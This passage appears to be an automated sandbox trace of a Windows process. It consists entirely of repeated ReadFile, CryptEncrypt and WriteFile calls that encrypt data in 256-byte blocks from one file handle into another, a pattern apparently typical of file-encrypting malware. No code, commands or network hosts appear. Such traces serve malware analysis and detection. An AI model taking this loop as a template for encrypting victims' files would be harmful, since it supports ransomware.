hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.584] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.584] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.584] GetLastError () returned 0x0 [0165.584] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.584] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.584] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.584] GetLastError () returned 0x0 [0165.584] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.584] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.584] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.584] GetLastError () returned 0x0 [0165.584] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.584] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.584] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.584] GetLastError () returned 0x0 [0165.584] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.584] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.584] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.584] GetLastError () returned 0x0 [0165.584] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.584] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.584] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.584] GetLastError () returned 0x0 [0165.584] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.585] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.585] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.585] GetLastError () returned 0x0 [0165.585] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.585] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.585] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.585] GetLastError () returned 0x0 [0165.585] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.585] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.585] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.585] GetLastError () returned 0x0 [0165.585] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.585] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.585] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.585] GetLastError () returned 0x0 [0165.585] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.585] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.585] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.585] GetLastError () returned 0x0 [0165.585] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.585] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.585] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.586] GetLastError () returned 0x0 [0165.586] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.586] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.586] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.586] GetLastError () returned 0x0 [0165.586] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.586] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.586] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.586] GetLastError () returned 0x0 [0165.586] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.586] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.586] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.586] GetLastError () returned 0x0 [0165.586] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.586] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.586] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.586] GetLastError () returned 0x0 [0165.586] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.586] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.586] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.586] GetLastError () returned 0x0 [0165.586] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.586] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.586] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.586] GetLastError () returned 0x0 [0165.586] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.587] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.587] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.587] GetLastError () returned 0x0 [0165.587] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.587] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.587] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.587] GetLastError () returned 0x0 [0165.587] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.587] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.587] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.587] GetLastError () returned 0x0 [0165.587] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.587] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.587] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.587] GetLastError () returned 0x0 [0165.587] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.587] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.587] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.587] GetLastError () returned 0x0 [0165.587] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.587] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.587] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.587] GetLastError () returned 0x0 [0165.587] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.587] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.588] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.588] GetLastError () returned 0x0 [0165.588] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.588] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.588] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.588] GetLastError () returned 0x0 [0165.588] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.588] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.588] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.588] GetLastError () returned 0x0 [0165.588] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.588] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.588] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.588] GetLastError () returned 0x0 [0165.588] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.588] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.588] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.588] GetLastError () returned 0x0 [0165.588] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.588] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.588] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.588] GetLastError () returned 0x0 [0165.588] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.588] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.588] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.588] GetLastError () returned 0x0 [0165.589] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.589] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.589] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, 